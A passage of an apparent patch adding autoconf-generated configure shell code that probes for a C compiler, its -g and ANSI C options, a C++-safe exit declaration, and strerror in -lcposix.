"${ECHO_T}$ac_cv_prog_cc_stdc" >&6 + CC="$CC $ac_cv_prog_cc_stdc" ;; +esac + +# Some people use a C++ compiler to compile C. Since we use `exit', +# in C++ we need to declare it. In case someone uses the same compiler +# for both compiling C and C++ we need to have the C++ compiler decide +# the declaration of exit, since it's the most demanding environment. +cat >conftest.$ac_ext <<_ACEOF +#ifndef __cplusplus + choke me +#endif +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + for ac_declaration in \ + '' \ + 'extern "C" void std::exit (int) throw (); using std::exit;' \ + 'extern "C" void std::exit (int); using std::exit;' \ + 'extern "C" void exit (int) throw ();' \ + 'extern "C" void exit (int);' \ + 'void exit (int);' +do + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +$ac_declaration +#include +int +main () +{ +exit (42); + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + : +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +continue +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +$ac_declaration +int +main () +{ +exit (42); + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + break +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +done +rm -f conftest* +if test -n "$ac_declaration"; then + echo '#ifdef __cplusplus' >>confdefs.h + echo $ac_declaration >>confdefs.h + echo '#endif' >>confdefs.h +fi + +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + + + echo "$as_me:$LINENO: checking for strerror in -lcposix" >&5 +echo $ECHO_N "checking for strerror in -lcposix... $ECHO_C" >&6 +if test "${ac_cv_lib_cposix_strerror+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + ac_check_lib_save_LIBS=$LIBS +LIBS="-lcposix $LIBS" +cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +/* Override any gcc2 internal prototype to avoid an error. */ +#ifdef __cplusplus +extern "C" +#endif +/* We use char because int might match the return type of a gcc2 + builtin and then its argument prototype would still apply. */ +char strerror (); +int +main () +{ +strerror (); + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext conftest$ac_exeext +if { (eval echo "$as_me:$LINENO: \"$ac_link\"") >&5 + (eval $ac_link) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest$ac_exeext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_cv_lib_cposix_strerror=yes +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +ac_cv_lib_cposix_strerror=no +fi +rm -f conftest.err conftest.$ac_objext \ + conftest$ac_exeext conftest.$ac_ext +LIBS=$ac_check_lib_save_LIBS +fi +echo "$as_me:$LINENO: result: $ac_cv_lib_cposix_strerror" >&5 +echo "${ECHO_T}$ac_cv_lib_cposix_strerror" >&6 +if test $ac_cv_lib_cposix_strerror = yes; then + LIBS="$LIBS -lcposix" +fi + + + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. +set dummy ${ac_tool_prefix}gcc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_CC="${ac_tool_prefix}gcc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "gcc", so it can be a program name with args. +set dummy gcc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_ac_ct_CC="gcc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 +echo "${ECHO_T}$ac_ct_CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + CC=$ac_ct_CC +else + CC="$ac_cv_prog_CC" +fi + +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. +set dummy ${ac_tool_prefix}cc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_CC="${ac_tool_prefix}cc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_ac_ct_CC="cc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 +echo "${ECHO_T}$ac_ct_CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + CC=$ac_ct_CC +else + CC="$ac_cv_prog_CC" +fi + +fi +if test -z "$CC"; then + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else + ac_prog_rejected=no +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then + ac_prog_rejected=yes + continue + fi + ac_cv_prog_CC="cc" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +if test $ac_prog_rejected = yes; then + # We found a bogon in the path, so make sure we never use it. + set dummy $ac_cv_prog_CC + shift + if test $# != 0; then + # We chose a different compiler from the bogus one. + # However, it has the same basename, so the bogon will be chosen + # first if we set CC to just the basename; use the full file name. + shift + ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" + fi +fi +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + +fi +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + for ac_prog in cl + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_CC="$ac_tool_prefix$ac_prog" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + echo "$as_me:$LINENO: result: $CC" >&5 +echo "${ECHO_T}$CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + test -n "$CC" && break + done +fi +if test -z "$CC"; then + ac_ct_CC=$CC + for ac_prog in cl +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +echo "$as_me:$LINENO: checking for $ac_word" >&5 +echo $ECHO_N "checking for $ac_word... $ECHO_C" >&6 +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_word$ac_exec_ext"; then + ac_cv_prog_ac_ct_CC="$ac_prog" + echo "$as_me:$LINENO: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done +done + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + echo "$as_me:$LINENO: result: $ac_ct_CC" >&5 +echo "${ECHO_T}$ac_ct_CC" >&6 +else + echo "$as_me:$LINENO: result: no" >&5 +echo "${ECHO_T}no" >&6 +fi + + test -n "$ac_ct_CC" && break +done + + CC=$ac_ct_CC +fi + +fi + + +test -z "$CC" && { { echo "$as_me:$LINENO: error: no acceptable C compiler found in \$PATH +See \`config.log' for more details." >&5 +echo "$as_me: error: no acceptable C compiler found in \$PATH +See \`config.log' for more details." >&2;} + { (exit 1); exit 1; }; } + +# Provide some information about the compiler. +echo "$as_me:$LINENO:" \ + "checking for C compiler version" >&5 +ac_compiler=`set X $ac_compile; echo $2` +{ (eval echo "$as_me:$LINENO: \"$ac_compiler --version &5\"") >&5 + (eval $ac_compiler --version &5) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } +{ (eval echo "$as_me:$LINENO: \"$ac_compiler -v &5\"") >&5 + (eval $ac_compiler -v &5) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } +{ (eval echo "$as_me:$LINENO: \"$ac_compiler -V &5\"") >&5 + (eval $ac_compiler -V &5) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } + +echo "$as_me:$LINENO: checking whether we are using the GNU C compiler" >&5 +echo $ECHO_N "checking whether we are using the GNU C compiler... $ECHO_C" >&6 +if test "${ac_cv_c_compiler_gnu+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_compiler_gnu=yes +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +ac_compiler_gnu=no +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_c_compiler_gnu=$ac_compiler_gnu + +fi +echo "$as_me:$LINENO: result: $ac_cv_c_compiler_gnu" >&5 +echo "${ECHO_T}$ac_cv_c_compiler_gnu" >&6 +GCC=`test $ac_compiler_gnu = yes && echo yes` +ac_test_CFLAGS=${CFLAGS+set} +ac_save_CFLAGS=$CFLAGS +CFLAGS="-g" +echo "$as_me:$LINENO: checking whether $CC accepts -g" >&5 +echo $ECHO_N "checking whether $CC accepts -g... $ECHO_C" >&6 +if test "${ac_cv_prog_cc_g+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_cv_prog_cc_g=yes +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +ac_cv_prog_cc_g=no +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +fi +echo "$as_me:$LINENO: result: $ac_cv_prog_cc_g" >&5 +echo "${ECHO_T}$ac_cv_prog_cc_g" >&6 +if test "$ac_test_CFLAGS" = set; then + CFLAGS=$ac_save_CFLAGS +elif test $ac_cv_prog_cc_g = yes; then + if test "$GCC" = yes; then + CFLAGS="-g -O2" + else + CFLAGS="-g" + fi +else + if test "$GCC" = yes; then + CFLAGS="-O2" + else + CFLAGS= + fi +fi +echo "$as_me:$LINENO: checking for $CC option to accept ANSI C" >&5 +echo $ECHO_N "checking for $CC option to accept ANSI C... $ECHO_C" >&6 +if test "${ac_cv_prog_cc_stdc+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + ac_cv_prog_cc_stdc=no +ac_save_CC=$CC +cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +#include +#include +#include +#include +/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ +struct buf { int x; }; +FILE * (*rcsopen) (struct buf *, struct stat *, int); +static char *e (p, i) + char **p; + int i; +{ + return p[i]; +} +static char *f (char * (*g) (char **, int), char **p, ...) +{ + char *s; + va_list v; + va_start (v,p); + s = g (p, va_arg (v,int)); + va_end (v); + return s; +} + +/* OSF 4.0 Compaq cc is some sort of almost-ANSI by default. It has + function prototypes and stuff, but not '\xHH' hex character constants. + These don't provoke an error unfortunately, instead are silently treated + as 'x'. The following induces an error, until -std1 is added to get + proper ANSI mode. Curiously '\x00'!='x' always comes out true, for an + array size at least. It's necessary to write '\x00'==0 to get something + that's true only with -std1. */ +int osf4_cc_array ['\x00' == 0 ? 1 : -1]; + +int test (int i, double x); +struct s1 {int (*f) (int a);}; +struct s2 {int (*f) (double a);}; +int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); +int argc; +char **argv; +int +main () +{ +return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; + ; + return 0; +} +_ACEOF +# Don't try gcc -ansi; that turns off useful extensions and +# breaks some systems' header files. +# AIX -qlanglvl=ansi +# Ultrix and OSF/1 -std1 +# HP-UX 10.20 and later -Ae +# HP-UX older versions -Aa -D_HPUX_SOURCE +# SVR4 -Xc -D__EXTENSIONS__ +for ac_arg in "" -qlanglvl=ansi -std1 -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" +do + CC="$ac_save_CC $ac_arg" + rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + ac_cv_prog_cc_stdc=$ac_arg +break +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext +done +rm -f conftest.$ac_ext conftest.$ac_objext +CC=$ac_save_CC + +fi + +case "x$ac_cv_prog_cc_stdc" in + x|xno) + echo "$as_me:$LINENO: result: none needed" >&5 +echo "${ECHO_T}none needed" >&6 ;; + *) + echo "$as_me:$LINENO: result: $ac_cv_prog_cc_stdc" >&5 +echo "${ECHO_T}$ac_cv_prog_cc_stdc" >&6 + CC="$CC $ac_cv_prog_cc_stdc" ;; +esac + +# Some people use a C++ compiler to compile C. Since we use `exit', +# in C++ we need to declare it. In case someone uses the same compiler +# for both compiling C and C++ we need to have the C++ compiler decide +# the declaration of exit, since it's the most demanding environment. +cat >conftest.$ac_ext <<_ACEOF +#ifndef __cplusplus + choke me +#endif +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + for ac_declaration in \ + '' \ + 'extern "C" void std::exit (int) throw (); using std::exit;' \ + 'extern "C" void std::exit (int); using std::exit;' \ + 'extern "C" void exit (int) throw ();' \ + 'extern "C" void exit (int);' \ + 'void exit (int);' +do + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +$ac_declaration +#include +int +main () +{ +exit (42); + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + : +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +continue +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext + cat >conftest.$ac_ext <<_ACEOF +/* confdefs.h. */ +_ACEOF +cat confdefs.h >>conftest.$ac_ext +cat >>conftest.$ac_ext <<_ACEOF +/* end confdefs.h. */ +$ac_declaration +int +main () +{ +exit (42); + ; + return 0; +} +_ACEOF +rm -f conftest.$ac_objext +if { (eval echo "$as_me:$LINENO: \"$ac_compile\"") >&5 + (eval $ac_compile) 2>conftest.er1 + ac_status=$? + grep -v '^ *+' conftest.er1 >conftest.err + rm -f conftest.er1 + cat conftest.err >&5 + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); } && + { ac_try='test -z "$ac_c_werror_flag" + || test ! -s conftest.err' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; } && + { ac_try='test -s conftest.$ac_objext' + { (eval echo "$as_me:$LINENO: \"$ac_try\"") >&5 + (eval $ac_try) 2>&5 + ac_status=$? + echo "$as_me:$LINENO: \$? = $ac_status" >&5 + (exit $ac_status); }; }; then + break +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +done +rm -f conftest* +if test -n "$ac_declaration"; then + echo '#ifdef __cplusplus' >>confdefs.h + echo $ac_declaration >>confdefs.h + echo '#endif' >>confdefs.h +fi + +else + echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +fi +rm -f conftest.err conftest.$ac_objext conftest.$ac_ext +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + + + +echo "$as_me:$LINENO: checking for ${CC-cc} option to accept ANSI C" >&5 +echo $ECHO_N "checking for ${CC-cc} option to accept ANSI C... $ECHO_C" >&6 +if test "${am_cv_prog_cc_stdc+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + am_cv_prog_cc_stdc=no +ac_save_CC="$CC" +# Don't try gcc 